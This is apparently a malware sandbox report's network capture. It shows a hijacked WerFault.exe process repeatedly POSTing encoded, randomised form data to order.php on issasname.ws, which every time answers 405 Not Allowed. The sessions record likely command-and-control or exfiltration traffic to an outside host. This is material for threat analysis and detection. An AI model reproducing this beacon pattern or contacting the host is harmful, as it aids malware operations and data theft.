                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.54970164.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:47.406786919 CET161OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1018
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:47.407196045 CET162OUTData Raw: 69 71 65 6d 61 69 3d 36 37 33 38 32 61 66 32 65 31 35 66 32 33 66 36 61 36 33 62 31 66 31 65 30 39 66 39 36 37 61 61 36 33 34 66 26 67 6d 79 65 3d 39 33 32 30 30 38 31 34 26 6b 75 6b 75 6b 75 6b 75 3d 35 31 38 32 45 39 45 31 36 45 44 37 36 30 36
                      Data Ascii: iqemai=67382af2e15f23f6a63b1f1e09f967aa634f&gmye=93200814&kukukuku=5182E9E16ED7606899377DBC258D753B100972548393DDB400551E92A9B73378DA8901A2AA00F975B580A937ADD31089C70102F5243E10596D8D1559E16C69F10F2156BA3D8BB183A63F7E46D9F7DBA6B7FA91787A443973
                      Dec 5, 2022 12:47:47.578309059 CET162INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:47 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:48.927165985 CET163OUTPOST /xyz/abc/order.php?id=1465544 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1042
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:48.996059895 CET164OUTData Raw: 6c 77 68 73 64 6f 7a 3d 33 35 65 63 31 35 38 64 64 62 39 39 65 34 38 64 31 36 37 39 39 30 31 34 32 33 31 61 65 61 32 65 35 39 39 66 30 33 36 30 38 34 39 61 64 62 35 31 32 31 62 63 26 6a 73 62 6b 74 3d 35 35 34 32 38 31 33 39 26 6e 61 6e 61 6e 61
                      Data Ascii: lwhsdoz=35ec158ddb99e48d16799014231aea2e599f0360849adb5121bc&jsbkt=55428139&nanananan=61b1f7397cb691b787efefe7ca4f35c48d0a83de11d1223756ab68b29818b44ef39a792d0dc5a90d22131501f2773ce6adeb90b89037dc56720770783af5bebddcdd46284bba733138ce90d29573c
                      Dec 5, 2022 12:47:49.098450899 CET164INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:49 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:50.129126072 CET165OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1062
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:50.129240036 CET166OUTData Raw: 61 67 67 6d 6d 73 73 79 3d 31 33 37 33 61 39 38 31 35 39 63 63 39 38 32 31 34 36 37 61 31 65 64 37 31 31 34 62 62 37 62 30 38 65 36 62 30 32 34 36 63 32 31 35 64 39 32 33 30 61 34 39 38 31 66 37 39 32 37 33 31 63 30 34 36 37 31 32 65 39 26 79 63
                      Data Ascii: aggmmssy=1373a98159cc9821467a1ed7114bb7b08e6b0246c215d9230a4981f792731c046712e9&ycaecg=47637092&ckmu=F9FFADF4B26CAD89030215419BD580003BECA43F25275ECC628C40CEBF22173B19D074E78EBD866AF436DF64F050017D573BD1FC5BF41C2209E85D72F7CA8C6F559281ED9D1D80
                      Dec 5, 2022 12:47:50.300355911 CET166INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:50 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      11192.168.2.54970264.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:53.551372051 CET168OUTPOST /xyz/abc/order.php?page=38 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1040
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:53.551389933 CET169OUTData Raw: 64 67 70 73 62 3d 31 34 36 66 34 39 61 63 62 37 39 30 64 36 64 65 32 33 66 30 31 36 65 35 34 32 30 37 34 35 26 62 63 6a 6b 72 73 74 61 62 3d 36 37 38 38 30 35 34 39 26 66 6b 76 61 6c 71 76 3d 36 37 32 32 42 43 37 41 39 37 34 36 35 33 45 36 42 42
                      Data Ascii: dgpsb=146f49acb790d6de23f016e5420745&bcjkrstab=67880549&fkvalqv=6722BC7A974653E6BBED11DDF1F228377A9A8985D968B8E2863628DC44D605EF0384F19399C8B77BFB295E096F27F541E7B63AB2E8396347F03B8F9B5A10DD54B2FE68CE719465A820F3C07DAC7F07F6B5F68A476F11B953B73
                      Dec 5, 2022 12:47:53.722367048 CET169INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:53 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:54.752098083 CET170OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1018
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:54.752161026 CET171OUTData Raw: 76 77 78 73 74 75 76 71 72 3d 46 35 35 46 44 33 32 44 42 46 36 44 31 39 36 42 43 30 26 74 73 72 6b 6a 69 68 3d 34 34 31 39 34 34 31 33 26 78 61 64 61 64 3d 46 34 37 38 34 38 34 36 37 33 43 32 43 44 31 37 36 32 33 35 46 33 36 39 39 31 46 33 41 46
                      Data Ascii: vwxstuvqr=F55FD32DBF6D196BC0&tsrkjih=44194413&xadad=F478484673C2CD176235F36991F3AF975E2986111EB456A8857D4B6071F2CCFE846EA978A60684F7CA0AFE54AE5ECD91AADF9AA5A1C5B6756D052079CC2FA86E344C770CF7D186928330A0BAB710C8E121611FBB322A349543274E5F3113B9C
                      Dec 5, 2022 12:47:54.923067093 CET171INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:54 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:55.956294060 CET172OUTPOST /xyz/abc/order.php?pid=925 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1046
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:55.956346035 CET173OUTData Raw: 64 6d 70 79 62 6b 74 3d 34 35 35 34 62 38 61 34 65 31 30 63 64 66 37 33 38 65 31 35 36 62 30 30 61 35 32 30 37 64 30 33 37 32 64 62 61 31 36 36 30 37 31 32 32 66 63 62 38 34 34 34 34 33 66 63 26 62 69 6a 71 72 3d 34 30 37 31 33 35 38 39 26 66 71
                      Data Ascii: dmpybkt=4554b8a4e10cdf738e156b00a5207d0372dba16607122fcb844443fc&bijqr=40713589&fqvglwhmx=68b083e2bf3bb7d355d3b392c114b060d1f23df56c644ab0411006c6d38725fafc1aac6662ac7033776e1ddd9fb56280bbc91689ad9c5efb22ea10858b2d542e471c5b18a108b2c8e583fb208
                      Dec 5, 2022 12:47:56.127250910 CET173INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:56 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.54970364.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:59.480753899 CET174OUTPOST /xyz/abc/order.php?id=575573 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1078
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:59.480783939 CET176OUTData Raw: 6a 73 62 6b 74 63 6c 75 64 3d 34 45 32 33 31 43 36 37 39 30 43 35 31 44 46 33 33 37 34 43 36 41 31 42 35 34 31 35 34 45 42 34 38 31 30 34 46 44 41 32 39 31 43 31 30 45 45 30 45 46 33 46 39 32 39 46 36 33 45 45 46 37 36 45 43 37 30 32 39 45 31 34
                      Data Ascii: jsbktclud=4E231C6790C51DF3374C6A1B54154EB48104FDA291C10EE0EF3F929F63EEF76EC7029E1483421C&hovcjqx=67662657&lwhsd=B7A7CA937E827038BBDF8713AB02CB820C1D0FCD28C83689E851C9CCF8E6C7333CC04FDC74946E5CAD4EF87D2AF55AF596C3FD19131DD4E58F37BE5CEC93E5A4BDC
                      Dec 5, 2022 12:47:59.688416004 CET176INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:59 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:48:00.735136032 CET177OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1078
                      Cache-Control: no-cache
                      Dec 5, 2022 12:48:00.735136032 CET178OUTData Raw: 68 75 68 75 68 75 68 75 68 3d 30 37 35 30 62 62 34 36 32 36 37 62 66 35 37 62 30 61 65 33 34 32 39 34 66 31 34 35 65 31 62 32 33 35 61 32 33 30 61 61 39 66 64 30 65 64 36 38 36 31 39 35 66 37 35 61 32 32 37 38 34 39 37 64 39 35 65 37 65 66 62 64
                      Data Ascii: huhuhuhuh=0750bb46267bf57b0ae34294f145e1b235a230aa9fd0ed686195f75a2278497d95e7efbde83752&fqbmxit=66311751&jyncr=ba161f42383abc1688d35a1b130f2cf6cbadaab980ce7c3d5453b7fd0c861cc56691d30af54357728aac3dcb5ce600ab017e836aa7b338ab7116e1cb828ae6edaa3
                      Dec 5, 2022 12:48:00.906112909 CET178INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:48:00 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:48:01.952442884 CET179OUTPOST /xyz/abc/order.php?id=8314615 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1040
                      Cache-Control: no-cache
                      Dec 5, 2022 12:48:01.953716993 CET180OUTData Raw: 77 79 61 63 65 67 69 6b 3d 38 35 34 30 33 33 32 36 26 79 63 67 6b 3d 65 37 34 31 38 31 37 34 34 61 62 33 66 30 32 36 38 64 65 37 38 64 31 65 38 37 30 62 65 34 36 63 62 63 34 62 39 37 26 61 67 6d 73 79 65 3d 35 45 32 31 31 43 32 31 30 33 35 42 46
                      Data Ascii: wyacegik=85403326&ycgk=e74181744ab3f0268de78d1e870be46cbc4b97&agmsye=5E211C21035BF692B39832CCC7D2FAD196EBBA17A082084A244588AAEF0D73D7C3E2F38F633B67E395845EB420D6B65D629266AE970B5110141E9F4B2AD2E6816B8F384B287960339548B4D98734C2FD2476ED4E3BD978
                      Dec 5, 2022 12:48:02.123313904 CET180INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:48:02 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.54970464.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:48:05.503144026 CET181OUTPOST /xyz/abc/order.php?id=5889637 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1056
                      Cache-Control: no-cache
                      Dec 5, 2022 12:48:05.503209114 CET182OUTData Raw: 72 69 7a 71 68 79 76 6d 64 3d 37 44 45 37 41 38 46 41 31 30 41 41 31 42 31 45 44 31 31 30 34 45 45 34 31 32 34 33 46 46 30 44 30 37 39 42 32 44 30 36 34 37 43 44 43 37 44 45 46 35 38 43 45 45 38 45 26 70 65 74 69 78 6d 68 3d 36 30 31 35 30 38 37
                      Data Ascii: rizqhyvmd=7DE7A8FA10AA1B1ED1104EE41243FF0D079B2D0647CDC7DEF58CEE8E&petixmh=60150873&tmfyr=07274c22d7fc9e2821e733976684185468059d1b009316c28b7fd60ccd55463cec06ed5121982edcc2aa72044585a6e345cf0590b1f5021e290942175734c4420d3986c20d6de158618ad3f20
                      Dec 5, 2022 12:48:05.674633980 CET183INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:48:05 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.54969364.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:46:58.298151016 CET109OUTPOST /xyz/abc/order.php?id=1637135 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1025
                      Cache-Control: no-cache
                      Dec 5, 2022 12:46:58.298513889 CET111OUTData Raw: 71 67 77 6d 3d 64 66 62 34 62 38 33 33 32 64 32 61 38 34 32 66 63 36 62 33 39 38 31 63 26 6f 63 71 65 73 67 75 69 3d 32 33 34 36 30 34 30 26 73 6b 63 75 6d 65 3d 38 33 39 38 30 34 34 39 41 34 36 37 43 30 43 46 38 32 34 36 34 46 35 38 46 42 46 38
                      Data Ascii: qgwm=dfb4b8332d2a842fc6b3981c&ocqesgui=2346040&skcume=83980449A467C0CF82464F58FBF82E5AFEB63496C9B80BB98C353173AD717EBA8E39CE0C9F36D545982EA8D4B75F69BC70CE2572AC8157BF8D8F6F8F323529BC40A20BE2047A855704A7D9208EEF3447BE59DD4B65156951F285A1C6EB4C1
                      Dec 5, 2022 12:46:58.470284939 CET111INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:46:58 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      3192.168.2.54969464.70.19.20380C:\Windows\SysWOW64\WerFault.exe
                      TimestampkBytes transferredDirectionData
                      Dec 5, 2022 12:47:01.737490892 CET112OUTPOST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1032
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:01.737490892 CET113OUTData Raw: 6f 63 71 65 79 6d 61 6f 3d 34 39 37 34 45 41 37 43 32 38 36 33 37 45 43 35 37 33 38 45 39 36 37 34 30 45 32 39 31 44 46 30 31 46 37 30 39 45 41 31 26 6d 79 6b 77 6f 61 3d 37 30 38 39 37 34 34 32 26 71 67 77 6d 3d 65 66 37 34 34 33 37 33 62 61 34
                      Data Ascii: ocqeymao=4974EA7C28637EC5738E96740E291DF01F709EA1&mykwoa=70897442&qgwm=ef744373ba4b89db020650d8ef2e6adc8f61e5eb5f737f3ae60a45858ac07877b150a2de07c55095c71cf7f0a9364d8a3dcd1cd8870b8b7f0dca58dc58ba029ce03cce7536673ed8baf5d4117c4dbdc7010bb66e4a21
                      Dec 5, 2022 12:47:01.909091949 CET114INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:01 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:02.958908081 CET114OUTPOST /xyz/abc/order.php?id=7277094 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1062
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:02.959630966 CET115OUTData Raw: 70 6b 7a 75 70 65 7a 3d 38 37 32 43 37 36 43 34 42 37 46 37 46 38 42 33 30 44 30 43 45 38 43 36 42 38 32 33 43 36 33 33 31 41 38 42 31 32 30 35 41 46 30 33 43 41 38 33 30 33 45 41 31 31 31 36 41 34 42 39 30 32 36 41 45 30 32 45 35 31 43 45 26 6e
                      Data Ascii: pkzupez=872C76C4B7F7F8B30D0CE8C6B823C6331A8B1205AF03CA8303EA1116A4B9026AE02E51CE&ngtmf=71781835&rofczqnkb=7BC7C06E02185D2E29AA77F9598DD93EF4F8DE34E5B53B78004491285A0D576020B8D775D6D933FF887E6C72F8F2F9E350BC227E6BAD27135711087A6BFC4FBBE433806C5
                      Dec 5, 2022 12:47:03.130175114 CET116INHTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:03 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
